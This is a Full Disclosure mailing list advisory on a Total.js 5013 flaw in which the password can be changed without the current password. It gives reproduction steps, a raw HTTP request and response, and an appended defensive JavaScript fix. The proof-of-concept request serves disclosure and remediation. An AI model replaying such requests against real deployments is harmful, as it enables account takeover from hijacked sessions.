Full Disclosure mailing list archives

Current Password not Required When Changing Password - totaljsv5013


From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 26 Oct 2025 17:34:19 +0000

# Exploit Title: Current Password not Required When Changing Password - totaljsv5013
# Date: 10/2025
# Exploit Author: Andrey Stoykov
# Version: 5013
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-43-current.html


Current Password not Required When Changing Password:

Steps to Reproduce:
1. Log in as a user and click on the profile icon
2. Select "Change Credentials"
3. The user would not be required to enter the current password to update the current password


// HTTP POST Request - Changing Password

POST /admin/ HTTP/1.1
Host: 192.168.58.153
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0
[...]

{"schema":"admin_save","data":{"name":"John Connor","login":"gz82g8WYq3","password":"Passw0rd!"}}


// HTTP Response - Changing Password

HTTP/1.1 200 OK
set-cookie: NPgdS=13030-39383d41540751460a15064b0f7449766a261756481745550d1f5f05414b061f5e6456343a630323750702160307415f584656405e390e3e38360e591d471c0619711511121d111f4f3a023530306156510b014f0d5045; Expires=Wed, 26 Nov 2025 16:25:39 GMT; Path=/; SameSite=Lax
content-type: application/json; charset=utf-8
cache-control: private, no-cache, no-store, max-age=0
vary: Accept-Encoding, Last-Modified, User-Agent
expires: -1
x-powered-by: Total.js
Date: Sun, 26 Oct 2025 16:25:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 16

{"success":true}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
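
A server-side check that addresses the behaviour shown in the request above, as an added example that is not part of the original post and is not Total.js code. The `currentPassword` field, the account record layout and every function name are assumptions made for illustration; the `name`, `login` and `password` fields mirror the posted request body.

```javascript
// Added example: not Total.js code. The "currentPassword" field and all
// function names here are assumptions made for illustration.
const crypto = require('node:crypto');

// Derive a 32-byte password hash with scrypt (Node.js built-in).
function hashPassword(password, salt) {
  return crypto.scryptSync(password, salt, 32);
}

// Build a stored account record (used below with constructed sample data).
function createAccount(name, login, password) {
  const salt = crypto.randomBytes(16);
  return { name, login, salt, hash: hashPassword(password, salt) };
}

// Constant-time comparison of a candidate password with the stored hash.
function verifyPassword(account, candidate) {
  if (typeof candidate !== 'string' || candidate.length === 0) return false;
  return crypto.timingSafeEqual(hashPassword(candidate, account.salt), account.hash);
}

// Handle the "data" object of an admin_save-style request. Changing the login
// or the password requires proof of the current password, not only a session.
function saveCredentials(account, data) {
  const changesLogin = typeof data.login === 'string' && data.login !== account.login;
  const changesPassword = typeof data.password === 'string' && data.password.length > 0;
  if ((changesLogin || changesPassword) && !verifyPassword(account, data.currentPassword)) {
    return { success: false, error: 'current password required' };
  }
  if (typeof data.name === 'string') account.name = data.name;
  if (changesLogin) account.login = data.login;
  if (changesPassword) {
    // Fresh salt on every password change.
    account.salt = crypto.randomBytes(16);
    account.hash = hashPassword(data.password, account.salt);
  }
  return { success: true };
}
```

With this check, a request body shaped like the one in the post, which carries no current password, is rejected and the stored hash is left unchanged.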

